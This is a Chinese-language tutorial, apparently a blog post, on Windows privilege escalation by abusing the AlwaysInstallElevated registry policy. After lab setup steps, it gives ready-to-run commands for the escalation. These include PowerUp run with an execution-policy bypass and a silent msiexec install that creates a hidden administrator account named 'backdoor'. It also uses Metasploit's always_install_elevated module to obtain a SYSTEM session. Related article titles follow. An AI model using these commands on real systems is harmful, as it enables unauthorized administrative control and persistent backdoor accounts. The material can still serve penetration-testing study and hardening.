[windows提权] 注册表AlwaysInstallElevated提权

简介: 注册表AlwaysInstallElevated是策略设置项,允许低权限用户以system权限运行安装文件,powerup中的Get-RegistryAlwaysInstallElevate模块可用来检查注册表键是否被设置。如果为Ture就证明是以system权限运行的,可提权。

一、提权简介

注册表AlwaysInstallElevated是策略设置项,允许低权限用户以system权限运行安装文件,powerup中的Get-RegistryAlwaysInstallElevate模块可用来检查注册表键是否被设置。如果为Ture就证明是以system权限运行的,可提权。



二、漏洞环境配置

①"运行"中输入gpedit.msc,打开组策略管理器

②计算机配置-->管理模板-->Windows 组件-->Windows Installer


③将"永远以高特权进行安装"编辑,选择开启


④用户配置-->管理模板-->Windows 组件-->Windows Installer中的"永远以高特权进行安装"编辑,也同样选择开启



三、提权操作

-使用powerup进行提权:

①以本地加载方式运行powerup,需要上传powerup.ps1到目标


powershell -exec bypass "import-module .\powerup.ps1;Get-RegistryAlwaysInstallElevated"

返回为Ture,存在提权漏洞


②利用Write-UserAddMSI模块生成msi文件


powershell -exec bypass "import-module .\powerup.ps1;Write-UserAddMSI"

可以看到在当前目录下成功生成msi文件


③以普通用户身份运行此msi文件


msiexec.exe /quiet /qn /i UserAdd.msi

成功添加用户backdoor,权限为管理员



-使用MSF进行提权:

MSF的exploit/windows/local/always_install_elevate模块可以自动完成提权操作,会创建一个随机文件名的msi文件,并在提权成功后删除此mai文件,攻击成功会返回system权限会话


①首先拿到一个不是最高权限的会话


getuid


②利用对应模块进行提权




use exploit/windows/local/always_install_elevatedset session 4run


攻击成功,返回了session 5


③查看session5的权限


getuid

成功提权至system

目录
相关文章
|
安全 关系型数据库 MySQL
windows提权总结
windows提权总结
328 1
|
Windows
Windows注册表维护与优化
Windows注册表维护与优化
67 0
|
Windows
Windows注册表基础
Windows注册表基础
53 0
|
5月前
|
Windows
【Windows驱动开发】注册表的基本操作(创建、打开、修改、读取、枚举)(附源码)
【Windows驱动开发】注册表的基本操作(创建、打开、修改、读取、枚举)(附源码)
|
5月前
|
Windows
windows系统bat批处理 清理注册表与蓝屏补丁
windows系统bat批处理 清理注册表与蓝屏补丁
46 1
|
安全 Windows
Windows提权/杀软进程在线对比
Windows提权/杀软进程在线对比
396 0
Windows提权/杀软进程在线对比
|
安全 Shell 测试技术
Windows提权EXP多种执行方式
Windows提权EXP多种执行方式
230 0
|
6月前
|
安全 Windows
Windows提权辅助工具
Windows提权辅助工具
154 1
|
11月前
|
存储 安全 API
8.5 Windows驱动开发:内核注册表增删改查
注册表是Windows中的一个重要的数据库,用于存储系统和应用程序的设置信息,注册表是一个巨大的树形结构,无论在应用层还是内核层操作注册表都有独立的API函数可以使用,而在内核中读写注册表则需要使用内核装用API函数,如下将依次介绍并封装一些案例,实现对注册表的创建,删除,更新,查询等操作。在Windows内核中,注册表是一种存储系统配置信息的机制,包括应用程序、硬件、驱动程序和操作系统的各种设置。内核提供了一些API函数,可以让驱动程序通过代码访问和修改注册表,以实现系统的配置和管理。下面简单介绍一下内核中的注册表增删改查操作:
112 0
8.5 Windows驱动开发:内核注册表增删改查
|
Java 测试技术 Windows
利用Windows RpcSs服务进行提权
利用Windows RpcSs服务进行提权
246 0